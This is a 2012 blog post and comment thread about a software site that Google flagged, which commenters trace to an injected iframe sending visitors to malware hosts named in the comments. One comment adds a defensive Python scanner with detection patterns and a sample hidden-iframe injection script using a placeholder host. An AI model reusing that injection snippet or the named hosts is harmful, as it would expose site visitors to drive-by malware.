Google has decided, today, that RadicalBreeze.com contains malware. And will harm your computer.
And they display a gigantic red page stating that you, along with your first born, will be slaughtered in the night -- to any man, woman or child who visits this website with Chrome or via a Google website.
The only thing available from RadicalBreeze.com is Illumination Software Creator.
Which is, most certainly, not malware.
[Unless you modify the word "malware" to mean "something significantly more advanced than a project that Google started but then gave up on because it was too hard".]
You'll notice on that fancy "you will be punched in the face by a goblin" page above that Google provides a link to their "Safe Browsing diagnostic page" for RadicalBreeze.com.
This page lists all of the problems Google found with the website in question.
The screenshot to the right shows it. Allow me to sum up the problems that Google has with RadicalBreeze.com.
"Site is listed as suspicious - visiting this web site may harm your computer."
Well that's no good! Luckily Google's nifty little tool will tell me what was suspicious so I can fix the problem.
"Of the 21 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-07-25, and suspicious content was never found on this site within the past 90 days."
Just to sum up:
RadicalBreeze.com is malicious and suspicious. Also, RadicalBreeze.com is not at all malicious nor suspicious... and never has been.
Right.
Now I just need to let Google know about the problem so they can fix their own system (which is either broken... or has been deliberately modified to block RadicalBreeze.com... in which case... Google.com is a malicious website).
They do claim to provide simple steps to request a "malware review". Those steps are as follows:
Request a malware review:
- On the Webmaster Tools Home page, select the site you want.
- Click Health, and then click Malware.
- Click Request a review.
This website is not there. And it won't let me add the website.
There is also no "Health" link (or anything that looks like it) on the "Webmaster Tools Home page" that I can click on.
The only form of contact they provide (including email, phone, IM, mailing address, etc.) is "noreply@google.com".
Which, as you might have guessed, will get you no reply.
So there is a problem. But there is no problem.
And there is a solution. But there is no solution.
Luckily you can contact them. But you cannot contact them.
Awesome.
So I am writing this now. Because the only way it seems that you can get Google to fix anything is to make a big deal about it in public.
UPDATE:
A few hours after I posted this article... my website was actually hacked. Looking through the logs, here's my best guess as to what happened:
- A backdoor was discovered in the Plesk control panel that was in use on that server. A backdoor which I did not know about.
- Google either knew about it or noticed many servers on the same network with the issue that *had* been compromised.
- My server was then deemed as "suspicious" because of that.
- I responded with this post.
- Somebody noticed it, noticed why it was labeled as such... and took advantage of the moment.
- Resulting in a little iframe being embedded in the bottom of the site that was fairly gnarly.
Which... lame. Sometimes the internet can be a very, very lame place.
But, luckily, I had you guys to help me get to the bottom of it! Things are mostly fixed now (radicalbreeze.com is pointing to lunduke.com right now -- or at least it will be once the DNS is updated everywhere -- and I'm working to salvage and fix what I can there).
When I clicked "visit anyway" it then said it had content from dynapass.ru; then, upon clicking "proceed anyway", it took me to the site.
Google, what a farce!
July 26th, 2012 at 2:03 am
I think that malware review only applies to sites under google analytics.
July 26th, 2012 at 2:06 am
I don’t get that on chrome. Has it been fixed?
July 26th, 2012 at 2:17 am
Not sure if it helps, but when I load the page, NOD32 pops up saying:
Address hass been blocked.
URL address:
“freshtds.eu/default.cgi”
IP address:
“94.100.27.20:80”
July 26th, 2012 at 2:18 am
I think it is probably some association they have given to your site for being hosted on AS13768 (PEER1) network. If you look at the diagnostic page for that they list a lot of malware (unsurprisingly, since it is a hosting network).
http://www.google.com/safebrowsing/diagnostic?site=AS:13768&hl=en
Hopefully it is just an error, seems crazy otherwise to punish you for just sharing the same hosting network as genuine malicious websites.
July 26th, 2012 at 2:19 am
That's not what I am getting; I am getting this.
What happened when Google visited this site?
Of the 21 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-07-25, and the last time suspicious content was found on this site was on 2012-07-25.
This site was hosted on 1 network(s) including AS13768 (PEER1).
July 26th, 2012 at 2:30 am
There’s an iframe at the bottom of your HTML that’s http://XXXXX.pl/runforestrun?sid=botnet_api (changed actual host to XXXXX so it’s invalid). That’s the one that redirects to dynapass.ru and then onto another site.
July 26th, 2012 at 2:49 am
http://stopmalvertising.com/malware-reports/runforestrun-pseudo-random-domains-and-random-exploit-kits.html
July 26th, 2012 at 2:52 am
Nick Read: Really? I’m not seeing that here on any browser. Even if I view the source. I mean… if that’s really the case, then that would explain it. But is anyone else seeing that?
July 26th, 2012 at 2:54 am
Nick: Same as Bryan; not seeing it, in Firefox at least, on the main page. What page is that on?
July 26th, 2012 at 2:56 am
The JS adds then removes the iframe, but Chrome seems to keep it around
https://www.dropbox.com/s/8mwvap9va73drba/Selection_001.png
Here’s the network trace too showing the redirects:
https://www.dropbox.com/s/qhfy9kdjjirjcpb/Selection_002.png
July 26th, 2012 at 2:58 am
According to Opera there's an iframe linking to http://purplecruiser.ru/trrrf on the page. That's probably where the problem lies.
Hmm, apparently the iframe changes every time I reload the page.
July 26th, 2012 at 3:07 am
FWIW I checked out http://radicalbreeze.com/ two ways. (1) Avast 7.0.1456 with the 120725-2 virus definition set reported the site has an “infection” named “URL:Mal” that is associated with the URL “http://uvrfvmdqaulekssfkfyqusor.sqqkemzg…”, and (2) https://www.virustotal.com/#url which is a multiple-product check checked it out with 28 different products and only had a hit from “Google Safebrowsing” as a “Malware Site” which is bogus as you’ve explained. A quick Google around looks like the URL:Mal warnings could be bogus.
July 26th, 2012 at 3:27 am
Bryan, your server has been hacked and malicious code was injected into your website. Allan would probably confirm that you need to find the security hole, fix it, reinstall everything, change all passwords, etc.
Or in short: Google is absolutely right to block your site. And to quote your friends at Techsnap: “Patch your shit!”.
Greetings,
Pierre
July 26th, 2012 at 4:30 am
If you’re still in doubt Bryan, see this urlquery.net report: http://urlquery.net/report.php?id=104059
July 26th, 2012 at 5:25 am
This is why you use DDG or IXQuick/Startpage along with any free software browser like Chromium or Firefox.
It’s possible that some mad person sent a false report.
July 26th, 2012 at 7:20 am
Pierre could be right. It'd be easy to confirm if there's some sort of log of code changes, of course. Or by running diffs against backups.
I wouldn’t say that /is/ the case without seeing any definite proof, though. It’s a bit rough to go from “Something weird has happened” to “Holy haxorz, Batman!” without seeing the code.
July 26th, 2012 at 10:02 am
Pierre is right.
If you view the site, like me, in Firefox with NoScript enabled, nothing happens. But with NoScript disabled I get a placeholder for the aforementioned iframe.
They won't show up in the source; you can see them, however, with Firebug.
So yeah, your site has been hacked, it seems.
July 26th, 2012 at 12:00 pm
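The comments above describe the mechanism: a script at the bottom of the page creates an iframe pointing at a host that changes on every reload, then removes it again, so it never shows up in view-source and only appears in a live DOM inspector. As an added example (not code from the post, from Radical Breeze, or from any of the commenters), here is a small Python scanner a site owner could run over the HTML files of a site, or over pages fetched from it, to flag exactly that pattern: hidden or third-party iframes, and inline scripts that build an iframe at runtime. The sample pages, the `.invalid` hosts and the heuristics are constructed assumptions; the `runforestrun?sid=botnet_api` path is the one mentioned in the comments.

```python
"""Static scanner for injected iframes in HTML from a possibly compromised site.

Added example, not code from the original post.  It flags the pattern the
comments describe: a script creates a hidden iframe pointing at a changing
host and removes it again, so the iframe never appears in view-source.
"""
import re
from html.parser import HTMLParser

# Heuristics for script that builds an iframe at runtime (assumptions about
# common injection code, not the exact payload from the post).
DYNAMIC_IFRAME = re.compile(
    r"createElement\s*\(\s*['\"]iframe['\"]\s*\)"
    r"|document\.write\s*\(.*?<\s*iframe"
    r"|innerHTML\s*\+?=.*?<\s*iframe",
    re.I | re.S,
)
# appendChild(...) followed by removeChild(...): shown only long enough to load.
ADD_THEN_REMOVE = re.compile(r"appendChild\s*\(.*removeChild\s*\(", re.S)
OBFUSCATION = re.compile(r"\beval\s*\(|String\.fromCharCode|unescape\s*\(", re.I)
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)


class _Collector(HTMLParser):
    """Collects <iframe> attributes and inline <script> bodies from one document."""

    def __init__(self):
        super().__init__()
        self.iframes = []   # one attribute dict per <iframe> tag
        self.scripts = []   # one string per inline <script> body
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))


def _is_hidden(attrs):
    """True for the classic drive-by geometry: 0/1 px size or hidden via style."""
    def tiny(value):
        try:
            return float(str(value).rstrip("px")) <= 1
        except ValueError:
            return False
    return (tiny(attrs.get("width")) and tiny(attrs.get("height"))) or bool(
        HIDDEN_STYLE.search(attrs.get("style", "")))


def _host_of(url):
    return re.sub(r"^[a-z]+://", "", url, flags=re.I).split("/")[0].lower()


def find_injected_iframes(html, trusted_hosts=()):
    """Return a list of findings ({kind, evidence, reasons}); [] means clean."""
    collector = _Collector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src, reasons = attrs.get("src", ""), []
        host = _host_of(src)
        if host and host not in trusted_hosts:
            reasons.append("third-party src " + host)
        if _is_hidden(attrs):
            reasons.append("hidden or 1x1 geometry")
        if reasons:
            findings.append({"kind": "static-iframe", "evidence": src, "reasons": reasons})
    for body in collector.scripts:
        reasons = []
        if DYNAMIC_IFRAME.search(body):
            reasons.append("script builds an iframe at runtime")
        if ADD_THEN_REMOVE.search(body):
            reasons.append("element appended then removed again")
        if OBFUSCATION.search(body):
            reasons.append("eval/fromCharCode/unescape obfuscation")
        if reasons:
            findings.append({"kind": "script-iframe", "evidence": body.strip()[:80],
                             "reasons": reasons})
    return findings


# Constructed samples.  The injected host is a deliberately invalid placeholder,
# not the real host; the path is the one the comments mention.
INFECTED_PAGE = """<html><body><h1>Illumination Software Creator</h1>
<script type="text/javascript">
var f = document.createElement('iframe');
f.src = 'http://PLACEHOLDER-INJECTED-HOST.invalid/runforestrun?sid=botnet_api';
f.width = 1; f.height = 1; f.style.visibility = 'hidden';
document.body.appendChild(f);
document.body.removeChild(f);
</script>
</body></html>"""

CLEAN_PAGE = """<html><body><h1>Illumination Software Creator</h1>
<iframe src="https://www.youtube.com/embed/EXAMPLE" width="560" height="315"></iframe>
</body></html>"""

if __name__ == "__main__":
    print("infected:", find_injected_iframes(INFECTED_PAGE))
    print("clean:", find_injected_iframes(CLEAN_PAGE, ("www.youtube.com",)))
```

Run it over every `.html`, `.php` and template file in the web root (and over a copy of the pages as actually served, since the injection may live in a database-driven footer rather than a file), passing the hosts you legitimately embed as `trusted_hosts`. A hit on `script-iframe` with the "appended then removed" reason is the signature the commenters saw; a static third-party iframe alone is lower confidence and needs a look by eye.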
When I visit the page, it does show a report of there being at least one instance of software being downloaded without the user's consent.
http://imgur.com/fXwLk
July 26th, 2012 at 2:02 pm
Yep you really pissed rms off!
July 26th, 2012 at 2:05 pm
I’m with pierre and James D. Check your site logs.
July 26th, 2012 at 2:19 pm
Bryan why were you not on LAS?
July 26th, 2012 at 2:43 pm
Details about the attack when visiting radicalbreeze.com
http://puu.sh/LUr1
July 26th, 2012 at 5:12 pm
Actually, just yesterday I was looking at the software and I did indeed get infected. I was kind of shocked, as it was the only page I had opened (only lunduke and the software pages were open). Not sure if it was from a rogue ad or what, but I did get some malware; it was easy to remove from safe mode. I was using IE at the time, at about 2pm PST I think.
July 26th, 2012 at 6:00 pm
Also, Firefox says the exact same thing.
July 26th, 2012 at 8:23 pm
Of the 21 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-07-25, and the last time suspicious content was found on this site was on 2012-07-25.
Malicious software is hosted on 1 domain(s), including dynapass.ru/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including sqqkemzgshwnkkrk.waw.pl/.
This site was hosted on 1 network(s) including AS13768 (PEER1).
July 26th, 2012 at 9:36 pm
Looks like comment spam, maybe ?
July 26th, 2012 at 9:36 pm
Bryan
Firefox is in on the act also. I got a suspected phishing site page.
July 27th, 2012 at 10:19 am
Happened to me too. They smacked 8 WordPress-installs on 8 domains in a single go. They didn’t use any well-known weakness to get in, but they used a well known weakness in how domains are usually set up at my webhost. Or at least used to be set up. My host now recommends a better way – which I have since switched to – sadly I hadn’t looked at their wiki for 3 years when the bad guys had their smash-and-grab-run.
The involved IPs in my case were Russian, Polish and Bulgarian. I don't think they used proxies or zombies; ISPs and law enforcement in those countries can't be arsed when it happens to small companies and/or individuals abroad. The implanted script randomly picked a domain from a list, requested a URL which in some cases redirected the visitor to some shady Russian sweepstake-type of site, or tried to download a file. It hid itself pretty darn well and replicated in several places in the database. I ended up reinstalling and blocking broad ranges of IPs for a couple of months. Haven't had them visit since. *knocks on wood*
July 27th, 2012 at 7:56 pm
Man, that sucks. Why do people have to be assholes and hack sites? Why not do something constructive if you're gonna be learning about that sort of thing?
August 1st, 2012 at 3:21 am